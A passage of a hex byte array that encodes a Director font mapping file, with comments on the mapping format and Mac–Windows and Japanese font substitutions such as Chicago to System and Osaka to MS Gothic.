0x6E, 0x67, 0x20, 0x74, 0x61, 0x62, 0x6C, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x44, 0x69, 0x72,
0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77,
0x73, 0x20, 0x0D, 0x3B, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F,
0x73, 0x68, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x49, 0x66, 0x20, 0x61, 0x20, 0x63, 0x6F, 0x70,
0x79, 0x20, 0x6F, 0x66, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x69,
0x73, 0x20, 0x69, 0x6E, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x61, 0x6D, 0x65, 0x20, 0x66, 0x6F,
0x6C, 0x64, 0x65, 0x72, 0x20, 0x6F, 0x72, 0x20, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72,
0x79, 0x20, 0x61, 0x73, 0x20, 0x74, 0x68, 0x65, 0x20, 0x0D, 0x3B, 0x20, 0x44, 0x69, 0x72, 0x65,
0x63, 0x74, 0x6F, 0x72, 0x20, 0x61, 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E,
0x2C, 0x20, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x6F, 0x72, 0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20,
0x61, 0x75, 0x74, 0x6F, 0x6D, 0x61, 0x74, 0x69, 0x63, 0x61, 0x6C, 0x6C, 0x79, 0x20, 0x69, 0x6E,
0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20,
0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x61, 0x62, 0x6C, 0x65,
0x20, 0x69, 0x6E, 0x20, 0x65, 0x76, 0x65, 0x72, 0x79, 0x20, 0x6E, 0x65, 0x77, 0x20, 0x6D, 0x6F,
0x76, 0x69, 0x65, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x2E, 0x0D,
0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x54, 0x6F, 0x20, 0x61, 0x64, 0x64, 0x20, 0x74, 0x68, 0x69, 0x73,
0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x61,
0x62, 0x6C, 0x65, 0x20, 0x74, 0x6F, 0x20, 0x61, 0x6E, 0x20, 0x65, 0x78, 0x69, 0x73, 0x74, 0x69,
0x6E, 0x67, 0x20, 0x6D, 0x6F, 0x76, 0x69, 0x65, 0x2C, 0x20, 0x63, 0x68, 0x6F, 0x6F, 0x73, 0x65,
0x20, 0x0D, 0x3B, 0x20, 0x4D, 0x6F, 0x76, 0x69, 0x65, 0x3A, 0x50, 0x72, 0x6F, 0x70, 0x65, 0x72,
0x74, 0x69, 0x65, 0x73, 0x2E, 0x2E, 0x2E, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x74, 0x68, 0x65,
0x20, 0x4D, 0x6F, 0x64, 0x69, 0x66, 0x79, 0x20, 0x6D, 0x65, 0x6E, 0x75, 0x2E, 0x20, 0x20, 0x54,
0x68, 0x65, 0x6E, 0x20, 0x63, 0x6C, 0x69, 0x63, 0x6B, 0x20, 0x4C, 0x6F, 0x61, 0x64, 0x20, 0x66,
0x72, 0x6F, 0x6D, 0x20, 0x46, 0x69, 0x6C, 0x65, 0x2E, 0x20, 0x20, 0x0D, 0x3B, 0x20, 0x55, 0x73,
0x65, 0x20, 0x74, 0x68, 0x65, 0x20, 0x64, 0x69, 0x61, 0x6C, 0x6F, 0x67, 0x20, 0x62, 0x6F, 0x78,
0x20, 0x74, 0x68, 0x61, 0x74, 0x20, 0x61, 0x70, 0x70, 0x65, 0x61, 0x72, 0x73, 0x20, 0x74, 0x6F,
0x20, 0x6C, 0x6F, 0x63, 0x61, 0x74, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C,
0x65, 0x2E, 0x0D, 0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20, 0x49, 0x6E,
0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x61, 0x20, 0x73, 0x65,
0x6D, 0x69, 0x63, 0x6F, 0x6C, 0x6F, 0x6E, 0x20, 0x61, 0x74, 0x20, 0x74, 0x68, 0x65, 0x20, 0x62,
0x65, 0x67, 0x69, 0x6E, 0x6E, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x66, 0x20, 0x61, 0x20, 0x6C, 0x69,
0x6E, 0x65, 0x20, 0x69, 0x6E, 0x64, 0x69, 0x63, 0x61, 0x74, 0x65, 0x73, 0x0D, 0x3B, 0x20, 0x61,
0x20, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x53, 0x70,
0x65, 0x63, 0x69, 0x61, 0x6C, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x4D,
0x61, 0x63, 0x20, 0x4F, 0x53, 0x58, 0x20, 0x75, 0x73, 0x65, 0x72, 0x73, 0x3A, 0x20, 0x54, 0x68,
0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x69, 0x73, 0x20, 0x73, 0x61, 0x76, 0x65, 0x64,
0x20, 0x75, 0x73, 0x69, 0x6E, 0x67, 0x20, 0x74, 0x68, 0x65, 0x20, 0x27, 0x43, 0x6C, 0x61, 0x73,
0x73, 0x69, 0x63, 0x27, 0x20, 0x6C, 0x69, 0x6E, 0x65, 0x0D, 0x3B, 0x20, 0x65, 0x6E, 0x64, 0x69,
0x6E, 0x67, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x20, 0x28, 0x43, 0x52,
0x29, 0x2E, 0x20, 0x20, 0x49, 0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x6E, 0x65, 0x65, 0x64, 0x20,
0x74, 0x6F, 0x20, 0x61, 0x6C, 0x74, 0x65, 0x72, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x73, 0x61, 0x76,
0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x2C, 0x20, 0x6D, 0x61, 0x6B,
0x65, 0x20, 0x73, 0x75, 0x72, 0x65, 0x20, 0x74, 0x6F, 0x20, 0x0D, 0x3B, 0x20, 0x70, 0x72, 0x65,
0x73, 0x65, 0x72, 0x76, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x2D, 0x20, 0x74, 0x68, 0x65,
0x20, 0x55, 0x4E, 0x49, 0x58, 0x20, 0x6C, 0x69, 0x6E, 0x65, 0x20, 0x65, 0x6E, 0x64, 0x69, 0x6E,
0x67, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x20, 0x28, 0x4C, 0x46, 0x29,
0x20, 0x77, 0x69, 0x6C, 0x6C, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x77, 0x6F, 0x72, 0x6B, 0x20, 0x70,
0x72, 0x6F, 0x70, 0x65, 0x72, 0x6C, 0x79, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D,
0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x3D, 0x0D, 0x3B, 0x0D,
0x3B, 0x20, 0x46, 0x4F, 0x4E, 0x54, 0x20, 0x4D, 0x41, 0x50, 0x50, 0x49, 0x4E, 0x47, 0x53, 0x20,
0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E,
0x67, 0x73, 0x20, 0x73, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x20, 0x77, 0x68, 0x69, 0x63, 0x68,
0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x20, 0x73,
0x75, 0x62, 0x73, 0x74, 0x69, 0x74, 0x75, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x20, 0x74, 0x6F, 0x20,
0x6D, 0x61, 0x6B, 0x65, 0x20, 0x77, 0x68, 0x65, 0x6E, 0x0D, 0x3B, 0x20, 0x6D, 0x6F, 0x76, 0x69,
0x6E, 0x67, 0x20, 0x61, 0x20, 0x6D, 0x6F, 0x76, 0x69, 0x65, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20,
0x6F, 0x6E, 0x65, 0x20, 0x70, 0x6C, 0x61, 0x74, 0x66, 0x6F, 0x72, 0x6D, 0x20, 0x74, 0x6F, 0x20,
0x61, 0x6E, 0x6F, 0x74, 0x68, 0x65, 0x72, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x54, 0x68, 0x65,
0x20, 0x66, 0x6F, 0x72, 0x6D, 0x61, 0x74, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x66, 0x6F, 0x6E, 0x74,
0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x69, 0x74,
0x69, 0x6F, 0x6E, 0x73, 0x20, 0x69, 0x73, 0x3A, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x50, 0x6C, 0x61,
0x74, 0x66, 0x6F, 0x72, 0x6D, 0x3A, 0x46, 0x6F, 0x6E, 0x74, 0x4E, 0x61, 0x6D, 0x65, 0x20, 0x3D,
0x3E, 0x20, 0x50, 0x6C, 0x61, 0x74, 0x66, 0x6F, 0x72, 0x6D, 0x3A, 0x46, 0x6F, 0x6E, 0x74, 0x4E,
0x61, 0x6D, 0x65, 0x20, 0x5B, 0x4D, 0x41, 0x50, 0x20, 0x4E, 0x4F, 0x4E, 0x45, 0x5D, 0x20, 0x5B,
0x6F, 0x6C, 0x64, 0x53, 0x69, 0x7A, 0x65, 0x20, 0x3D, 0x3E, 0x20, 0x6E, 0x65, 0x77, 0x53, 0x69,
0x7A, 0x65, 0x5D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x53, 0x70, 0x65, 0x63, 0x69,
0x66, 0x79, 0x69, 0x6E, 0x67, 0x20, 0x4D, 0x41, 0x50, 0x20, 0x4E, 0x4F, 0x4E, 0x45, 0x20, 0x74,
0x75, 0x72, 0x6E, 0x73, 0x20, 0x6F, 0x66, 0x66, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74,
0x65, 0x72, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x74,
0x68, 0x69, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x2E, 0x0D, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x49,
0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x73, 0x70, 0x65, 0x63, 0x69, 0x66, 0x79, 0x20, 0x73, 0x69,
0x7A, 0x65, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x2C, 0x20, 0x74, 0x68, 0x65,
0x79, 0x20, 0x61, 0x70, 0x70, 0x6C, 0x79, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x54, 0x48, 0x41, 0x54,
0x20, 0x46, 0x4F, 0x4E, 0x54, 0x20, 0x4F, 0x4E, 0x4C, 0x59, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20,
0x48, 0x65, 0x72, 0x65, 0x20, 0x61, 0x72, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x79,
0x70, 0x69, 0x63, 0x61, 0x6C, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x66,
0x6F, 0x72, 0x20, 0x74, 0x68, 0x65, 0x20, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x20,
0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x3A,
0x0D, 0x3B, 0x0D, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x68, 0x69, 0x63, 0x61, 0x67, 0x6F, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x73,
0x74, 0x65, 0x6D, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F,
0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x47,
0x65, 0x6E, 0x65, 0x76, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,
0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E, 0x73, 0x20, 0x53, 0x65, 0x72,
0x69, 0x66, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x48, 0x65, 0x6C, 0x76, 0x65, 0x74, 0x69, 0x63,
0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x41, 0x72, 0x69,
0x61, 0x6C, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x4D, 0x6F, 0x6E, 0x61, 0x63, 0x6F, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x54, 0x65, 0x72, 0x6D,
0x69, 0x6E, 0x61, 0x6C, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x4E, 0x65, 0x77, 0x20, 0x59, 0x6F,
0x72, 0x6B, 0x22, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D,
0x53, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x79, 0x6D,
0x62, 0x6F, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69,
0x6E, 0x3A, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x20, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F,
0x6E, 0x65, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D,
0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x31, 0x34,
0x3D, 0x3E, 0x31, 0x32, 0x20, 0x31, 0x38, 0x3D, 0x3E, 0x31, 0x34, 0x20, 0x32, 0x34, 0x3D, 0x3E,
0x31, 0x38, 0x20, 0x33, 0x30, 0x3D, 0x3E, 0x32, 0x34, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x50, 0x61,
0x6C, 0x61, 0x74, 0x69, 0x6E, 0x6F, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57,
0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F,
0x6D, 0x61, 0x6E, 0x22, 0x0D, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x48, 0x65, 0x72, 0x65, 0x20, 0x61,
0x72, 0x65, 0x20, 0x73, 0x6F, 0x6D, 0x65, 0x20, 0x74, 0x79, 0x70, 0x69, 0x63, 0x61, 0x6C, 0x20,
0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x20, 0x66, 0x6F, 0x72, 0x20, 0x74, 0x68, 0x65,
0x20, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x64, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77,
0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x3A, 0x0D, 0x3B, 0x0D, 0x0D, 0x57, 0x69, 0x6E, 0x3A,
0x41, 0x72, 0x69, 0x61, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x48, 0x65, 0x6C, 0x76, 0x65, 0x74, 0x69,
0x63, 0x61, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x22,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A,
0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x43, 0x6F, 0x75,
0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E,
0x20, 0x4D, 0x61, 0x63, 0x3A, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x0D, 0x57, 0x69, 0x6E,
0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x4E, 0x65, 0x77, 0x20, 0x59,
0x6F, 0x72, 0x6B, 0x22, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E,
0x73, 0x20, 0x53, 0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61,
0x63, 0x3A, 0x47, 0x65, 0x6E, 0x65, 0x76, 0x61, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x6D,
0x62, 0x6F, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D,
0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 0x20, 0x20, 0x4D, 0x61,
0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x53, 0x79, 0x73, 0x74, 0x65,
0x6D, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,
0x4D, 0x61, 0x63, 0x3A, 0x43, 0x68, 0x69, 0x63, 0x61, 0x67, 0x6F, 0x0D, 0x57, 0x69, 0x6E, 0x3A,
0x54, 0x65, 0x72, 0x6D, 0x69, 0x6E, 0x61, 0x6C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4D, 0x6F, 0x6E, 0x61, 0x63, 0x6F, 0x0D,
0x57, 0x69, 0x6E, 0x3A, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52,
0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x22, 0x54, 0x69,
0x6D, 0x65, 0x73, 0x22, 0x20, 0x31, 0x32, 0x3D, 0x3E, 0x31, 0x34, 0x20, 0x31, 0x34, 0x3D, 0x3E,
0x31, 0x38, 0x20, 0x31, 0x38, 0x3D, 0x3E, 0x32, 0x34, 0x20, 0x32, 0x34, 0x3D, 0x3E, 0x33, 0x30,
0x0D, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20, 0x57, 0x68, 0x65, 0x6E, 0x20, 0x6D,
0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x66, 0x72, 0x6F, 0x6D, 0x20, 0x57, 0x69, 0x6E, 0x64,
0x6F, 0x77, 0x73, 0x20, 0x74, 0x6F, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68,
0x2C, 0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x43, 0x6F,
0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70,
0x20, 0x6F, 0x6E, 0x74, 0x6F, 0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x2E, 0x20, 0x20,
0x57, 0x68, 0x65, 0x6E, 0x20, 0x63, 0x6F, 0x6D, 0x69, 0x6E, 0x67, 0x20, 0x62, 0x61, 0x63, 0x6B,
0x20, 0x74, 0x6F, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x6F, 0x6E, 0x6C, 0x79,
0x20, 0x43, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20, 0x4E, 0x65, 0x77, 0x0D, 0x3B, 0x20, 0x77,
0x69, 0x6C, 0x6C, 0x20, 0x62, 0x65, 0x20, 0x75, 0x73, 0x65, 0x64, 0x2E, 0x0D, 0x0D, 0x3B, 0x20,
0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61,
0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x0D, 0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x54, 0x68, 0x65, 0x20,
0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20, 0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65,
0x73, 0x65, 0x20, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x69, 0x73,
0x20, 0x6D, 0x61, 0x70, 0x70, 0x65, 0x64, 0x20, 0x74, 0x6F, 0x20, 0x61, 0x20, 0x57, 0x69, 0x6E,
0x64, 0x6F, 0x77, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x2C, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x0D,
0x3B, 0x20, 0x61, 0x6C, 0x6C, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x66, 0x6F,
0x6E, 0x74, 0x73, 0x20, 0x61, 0x72, 0x65, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x65, 0x64, 0x20, 0x74,
0x6F, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x27, 0x73, 0x20, 0x4F, 0x73,
0x61, 0x6B, 0x61, 0x2E, 0x20, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x20, 0x69,
0x73, 0x20, 0x75, 0x73, 0x65, 0x64, 0x0D, 0x3B, 0x20, 0x62, 0x65, 0x63, 0x61, 0x75, 0x73, 0x65,
0x20, 0x6F, 0x6E, 0x6C, 0x79, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x20, 0x66, 0x6F, 0x6E, 0x74,
0x73, 0x20, 0x6E, 0x65, 0x65, 0x64, 0x20, 0x75, 0x70, 0x70, 0x65, 0x72, 0x2D, 0x41, 0x53, 0x43,
0x49, 0x49, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x73, 0x20, 0x6D, 0x61,
0x70, 0x70, 0x65, 0x64, 0x2E, 0x20, 0x20, 0x54, 0x6F, 0x20, 0x70, 0x72, 0x65, 0x76, 0x65, 0x6E,
0x74, 0x20, 0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x66, 0x20,
0x61, 0x6E, 0x79, 0x20, 0x61, 0x64, 0x64, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x61, 0x6C, 0x20, 0x4A,
0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x2C, 0x20, 0x61,
0x64, 0x64, 0x20, 0x74, 0x68, 0x65, 0x6D, 0x20, 0x74, 0x6F, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20,
0x6C, 0x69, 0x73, 0x74, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20,
0x49, 0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x64, 0x6F, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x68, 0x61,
0x76, 0x65, 0x20, 0x61, 0x20, 0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x73, 0x79,
0x73, 0x74, 0x65, 0x6D, 0x2C, 0x20, 0x74, 0x68, 0x65, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x73, 0x20, 0x62, 0x65, 0x6C, 0x6F, 0x77, 0x20, 0x0D, 0x3B, 0x20, 0x77, 0x69,
0x6C, 0x6C, 0x20, 0x61, 0x70, 0x70, 0x65, 0x61, 0x72, 0x20, 0x74, 0x6F, 0x20, 0x62, 0x65, 0x20,
0x75, 0x6E, 0x72, 0x65, 0x61, 0x64, 0x61, 0x62, 0x6C, 0x65, 0x2E, 0x0D, 0x4D, 0x61, 0x63, 0x3A,
0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF, 0xBC, 0xB3, 0x20, 0xE3,
0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22, 0x20, 0x4D, 0x61, 0x70,
0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF,
0xBC, 0xB3, 0x20, 0xE3, 0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22,
0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61,
0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF,
0xBC, 0xB3, 0x20, 0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D,
